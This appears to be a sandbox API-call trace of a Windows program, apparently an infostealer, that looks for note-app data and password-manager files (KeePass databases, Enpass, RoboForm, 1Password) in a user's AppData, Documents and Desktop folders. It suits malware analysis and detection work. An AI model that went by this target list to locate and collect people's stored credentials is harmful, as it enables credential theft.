lpFindFileData=0x19f8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x747e20, ftLastWriteTime.dwHighDateTime=0x747e20, nFileSizeHigh=0x753f70, nFileSizeLow=0x754188, dwReserved0=0x0, dwReserved1=0x19f954, cFileName="ը瞼", cAlternateFileName="⦰螚䇆䑟鋫ﭜ\x19䂑@")) returned 0xffffffff [0255.462] GetProcessHeap () returned 0x740000 [0255.463] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0255.463] GetProcessHeap () returned 0x740000 [0255.463] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0255.463] GetProcessHeap () returned 0x740000 [0255.463] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0255.592] GetProcessHeap () returned 0x740000 [0255.593] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b8a8 | out: hHeap=0x740000) returned 1 [0255.593] GetProcessHeap () returned 0x740000 [0255.593] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f74) returned 0x75ca78 [0255.593] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0255.594] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\To-Do DeskList\\tasks.db", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 61 [0255.594] GetProcessHeap () returned 0x740000 [0255.594] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75a7c8 [0255.594] GetProcessHeap () returned 0x740000 [0255.595] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0255.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0255.597] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 0 [0255.602] GetProcessHeap () returned 0x740000 [0255.603] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0255.603] GetProcessHeap () returned 0x740000 [0255.603] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x12c) returned 0x75a7c8 [0255.603] GetProcessHeap () returned 0x740000 [0255.603] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b7e8 [0255.603] GetProcessHeap () returned 0x740000 [0255.603] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0255.604] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0255.605] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0255.605] GetProcessHeap () returned 0x740000 [0255.605] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f64) returned 0x75ca78 [0255.605] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0255.606] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\stickies\\images", arglist=0x19fb24 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 53 [0255.606] GetProcessHeap () returned 0x740000 [0255.606] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6e) returned 0x75b6c0 [0255.606] GetProcessHeap () returned 0x740000 [0255.607] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0255.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0255.608] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 0 [0255.608] GetProcessHeap () returned 0x740000 [0255.608] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0255.608] GetProcessHeap () returned 0x740000 [0255.608] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0255.608] GetProcessHeap () returned 0x740000 [0255.608] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0255.609] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0255.609] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0255.609] GetProcessHeap () returned 0x740000 [0255.609] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x75ca78 [0255.610] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0255.611] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\stickies\\rtf", arglist=0x19fb0c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 50 [0255.611] GetProcessHeap () returned 0x740000 [0255.611] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x68) returned 0x75b6c0 [0255.611] GetProcessHeap () returned 0x740000 [0255.611] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0255.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0255.612] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\rtf") returned 0 [0255.612] GetProcessHeap () returned 0x740000 [0255.612] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0255.613] GetProcessHeap () returned 0x740000 [0255.613] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0255.613] GetProcessHeap () returned 0x740000 [0255.613] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0255.613] GetProcessHeap () returned 0x740000 [0255.613] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b7e8 | out: hHeap=0x740000) returned 1 [0255.613] GetProcessHeap () returned 0x740000 [0255.613] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x12c) returned 0x75a7c8 [0255.613] GetProcessHeap () returned 0x740000 [0255.613] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc) returned 0x74b7e8 [0255.613] GetProcessHeap () returned 0x740000 [0255.613] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0255.614] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0255.614] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0255.615] GetProcessHeap () returned 0x740000 [0255.615] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f60) returned 0x75ca78 [0255.615] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0255.616] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\NoteFly\\notes", arglist=0x19fb54 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 51 [0255.616] GetProcessHeap () returned 0x740000 [0255.616] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6a) returned 0x75b6c0 [0255.616] GetProcessHeap () returned 0x740000 [0255.616] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0255.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0255.617] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NoteFly\\notes") returned 0 [0255.617] GetProcessHeap () returned 0x740000 [0255.618] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0255.618] GetProcessHeap () returned 0x740000 [0255.618] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6c0 | out: hHeap=0x740000) returned 1 [0255.618] GetProcessHeap () returned 0x740000 [0256.131] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.131] GetProcessHeap () returned 0x740000 [0256.131] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b7e8 | out: hHeap=0x740000) returned 1 [0256.131] GetProcessHeap () returned 0x740000 [0256.131] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f86) returned 0x75ca78 [0256.131] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.132] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\Conceptworld\\Notezilla\\Notes8.db", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 70 [0256.132] GetProcessHeap () returned 0x740000 [0256.132] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x90) returned 0x75a7c8 [0256.132] GetProcessHeap () returned 0x740000 [0256.133] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.133] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.133] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Conceptworld\\Notezilla\\Notes8.db") returned 0 [0256.134] GetProcessHeap () returned 0x740000 [0256.134] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.134] GetProcessHeap () returned 0x740000 [0256.134] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f92) returned 0x75ca78 [0256.135] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.136] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\Microsoft\\Sticky Notes\\StickyNotes.snt", arglist=0x19fb3c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 76 [0256.136] GetProcessHeap () returned 0x740000 [0256.136] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x9c) returned 0x74ac38 [0256.136] GetProcessHeap () returned 0x740000 [0256.136] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.137] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.137] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Sticky Notes\\StickyNotes.snt") returned 0 [0256.137] GetProcessHeap () returned 0x740000 [0256.138] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74ac38 | out: hHeap=0x740000) returned 1 [0256.138] GetProcessHeap () returned 0x740000 [0256.138] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.138] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.139] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0256.139] GetProcessHeap () returned 0x740000 [0256.139] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f44) returned 0x75ca78 [0256.140] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.140] wvsprintfW (in: param_1=0x75ca78, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0256.140] GetProcessHeap () returned 0x740000 [0256.140] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x42) returned 0x75af58 [0256.140] GetProcessHeap () returned 0x740000 [0256.141] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.143] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0256.143] GetProcessHeap () returned 0x740000 [0256.144] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0256.145] Sleep (dwMilliseconds=0xa) [0256.238] GetProcessHeap () returned 0x740000 [0256.238] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0256.316] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.317] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx") returned 38 [0256.317] GetProcessHeap () returned 0x740000 [0256.317] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x50) returned 0x75a7c8 [0256.317] GetProcessHeap () returned 0x740000 [0256.318] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.318] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdbx", lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="꽘uꒈu")) returned 0xffffffff [0256.318] GetProcessHeap () returned 0x740000 [0256.319] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.319] GetProcessHeap () returned 0x740000 [0256.319] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75af58 | out: hHeap=0x740000) returned 1 [0256.319] GetProcessHeap () returned 0x740000 [0256.319] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.319] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.320] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0256.320] GetProcessHeap () returned 0x740000 [0256.320] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f44) returned 0x75ca78 [0256.321] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.321] wvsprintfW (in: param_1=0x75ca78, param_2="%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0256.321] GetProcessHeap () returned 0x740000 [0256.321] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7542f8 [0256.321] GetProcessHeap () returned 0x740000 [0256.322] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.322] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0256.323] GetProcessHeap () returned 0x740000 [0256.323] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0256.324] Sleep (dwMilliseconds=0xa) [0256.447] GetProcessHeap () returned 0x740000 [0256.448] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0256.448] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.449] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19f8c8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx") returned 36 [0256.449] GetProcessHeap () returned 0x740000 [0256.449] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4c) returned 0x75a7c8 [0256.449] GetProcessHeap () returned 0x740000 [0256.450] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.451] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdbx", lpFindFileData=0x19f8dc | out: lpFindFileData=0x19f8dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䋸uꒈu")) returned 0xffffffff [0256.549] GetProcessHeap () returned 0x740000 [0256.550] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.550] GetProcessHeap () returned 0x740000 [0256.550] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7542f8 | out: hHeap=0x740000) returned 1 [0256.550] GetProcessHeap () returned 0x740000 [0256.550] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.551] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.552] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0256.552] GetProcessHeap () returned 0x740000 [0256.552] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f44) returned 0x75ca78 [0256.553] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.554] wvsprintfW (in: param_1=0x75ca78, param_2="%s", arglist=0x19fb30 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 31 [0256.554] GetProcessHeap () returned 0x740000 [0256.554] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x42) returned 0x75ad78 [0256.554] GetProcessHeap () returned 0x740000 [0256.554] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.555] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 1 [0256.556] GetProcessHeap () returned 0x740000 [0256.556] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0256.558] Sleep (dwMilliseconds=0xa) [0256.666] GetProcessHeap () returned 0x740000 [0256.666] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0256.667] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.668] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19f8b0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb") returned 37 [0256.668] GetProcessHeap () returned 0x740000 [0256.668] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4e) returned 0x75a7c8 [0256.668] GetProcessHeap () returned 0x740000 [0256.669] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.669] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.kdb", lpFindFileData=0x19f8c4 | out: lpFindFileData=0x19f8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="굸uꒈu")) returned 0xffffffff [0256.670] GetProcessHeap () returned 0x740000 [0256.670] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.670] GetProcessHeap () returned 0x740000 [0256.671] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ad78 | out: hHeap=0x740000) returned 1 [0256.671] GetProcessHeap () returned 0x740000 [0256.671] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.672] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.673] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0256.673] GetProcessHeap () returned 0x740000 [0256.673] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f44) returned 0x75ca78 [0256.674] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.675] wvsprintfW (in: param_1=0x75ca78, param_2="%s", arglist=0x19fb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 29 [0256.675] GetProcessHeap () returned 0x740000 [0256.675] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7542f8 [0256.675] GetProcessHeap () returned 0x740000 [0256.675] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.676] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0256.677] GetProcessHeap () returned 0x740000 [0256.677] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0256.678] Sleep (dwMilliseconds=0xa) [0256.826] GetProcessHeap () returned 0x740000 [0256.826] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75ca78 [0256.827] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.828] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\%s", arglist=0x19f8e0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb") returned 35 [0256.828] GetProcessHeap () returned 0x740000 [0256.828] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4a) returned 0x75a7c8 [0256.828] GetProcessHeap () returned 0x740000 [0256.829] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.912] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.kdb", lpFindFileData=0x19f8f4 | out: lpFindFileData=0x19f8f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="䋸uꒈu")) returned 0xffffffff [0256.912] GetProcessHeap () returned 0x740000 [0256.913] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.913] GetProcessHeap () returned 0x740000 [0256.913] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7542f8 | out: hHeap=0x740000) returned 1 [0256.913] GetProcessHeap () returned 0x740000 [0256.913] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.914] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.915] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0256.915] GetProcessHeap () returned 0x740000 [0256.915] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f52) returned 0x75ca78 [0256.916] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.917] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\Enpass", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 38 [0256.917] GetProcessHeap () returned 0x740000 [0256.917] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x50) returned 0x75a7c8 [0256.917] GetProcessHeap () returned 0x740000 [0256.918] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.919] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.919] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\Enpass") returned 0 [0256.919] GetProcessHeap () returned 0x740000 [0256.920] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0256.920] GetProcessHeap () returned 0x740000 [0256.920] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.920] GetProcessHeap () returned 0x740000 [0256.920] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.921] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.921] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0256.921] GetProcessHeap () returned 0x740000 [0256.921] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f66) returned 0x75ca78 [0256.922] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.923] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\My RoboForm Data", arglist=0x19fb68 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 48 [0256.923] GetProcessHeap () returned 0x740000 [0256.923] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x64) returned 0x75a7c8 [0256.923] GetProcessHeap () returned 0x740000 [0256.924] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.925] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\My RoboForm Data") returned 0 [0256.925] GetProcessHeap () returned 0x740000 [0256.925] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.925] GetProcessHeap () returned 0x740000 [0256.925] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a488 | out: hHeap=0x740000) returned 1 [0256.925] GetProcessHeap () returned 0x740000 [0256.926] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x208) returned 0x75a488 [0256.927] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75690000 [0256.927] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x75a488 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0256.927] GetProcessHeap () returned 0x740000 [0256.927] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f58) returned 0x75ca78 [0256.928] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0256.929] wvsprintfW (in: param_1=0x75ca78, param_2="%s\\1Password", arglist=0x19fb74 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 41 [0256.929] GetProcessHeap () returned 0x740000 [0256.929] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x56) returned 0x75a7c8 [0256.929] GetProcessHeap () returned 0x740000 [0256.930] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75ca78 | out: hHeap=0x740000) returned 1 [0256.931] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0256.931] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\1Password") returned 0 [0256.931] GetProcessHeap () returned 0x740000 [0256.932] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75a7c8 | out: hHeap=0x740000) returned 1 [0256.932] GetProcessHeap () returned 0x740000 [0256.932] HeapFree 